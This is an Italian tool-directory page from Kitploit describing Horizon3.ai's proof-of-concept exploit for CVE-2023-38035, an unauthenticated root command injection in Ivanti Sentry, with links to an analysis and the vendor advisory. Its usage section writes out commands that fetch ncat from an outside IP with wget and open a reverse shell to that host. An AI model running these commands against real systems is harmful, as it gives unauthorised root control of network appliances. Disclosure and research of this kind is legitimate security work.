Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-38035 — Exploit proof-of-concept per CVE-2023-38035, un'iniezione di comandi non autenticata in Ivanti Sentry che consente l'esecuzione arbitraria di comandi root e una shell inversa tramite ncat. | Kitploit
Strumenti/GitHubGitHub/horizon3ai/cve-2023-38035
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubhorizon3ai/cve-2023-38035

CVE-2023-38035

Exploit proof-of-concept per CVE-2023-38035, un'iniezione di comandi non autenticata in Ivanti Sentry che consente l'esecuzione arbitraria di comandi root e una shell inversa tramite ncat.

Vedi Repository
411243 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-38035

POC per CVE-2023-38035 che colpisce Ivanti Sentry

Analisi Tecnica

Un'analisi tecnica della causa principale della vulnerabilità è disponibile sul nostro blog: https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive

Riepilogo

Questo POC sfrutta un'iniezione di comandi non autenticata per eseguire comandi arbitrari come utente root.

Il contesto di esecuzione non consente il piping dei comandi e il sistema non fornisce binari facilmente sfruttabili, quindi i comandi possono essere concatenati per scaricare un ncat statico da qualche parte come https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat.

Utilizzo

root@kitploit:~
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat' 
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
[+] Successfully executed command on target!

Shell

Mitigazioni

Aggiornare all'ultima versione secondo le istruzioni contenute nell'avviso Ivanti

  • https://forums.ivanti.com/s/article/KB-API-Authentication-Bypass-on-Sentry-Administrator-Interface-CVE-2023-38035?language=en_US

Segui l'Horizon3.ai Attack Team su Twitter per le ultime ricerche sulla sicurezza:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Dichiarazione di non responsabilità

Questo software è stato creato puramente a scopo di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è destinato a essere utilizzato per attaccare sistemi se non espressamente autorizzato. I manutentori del progetto non sono responsabili per un uso improprio del software. Usalo in modo responsabile.

Scarica lo strumento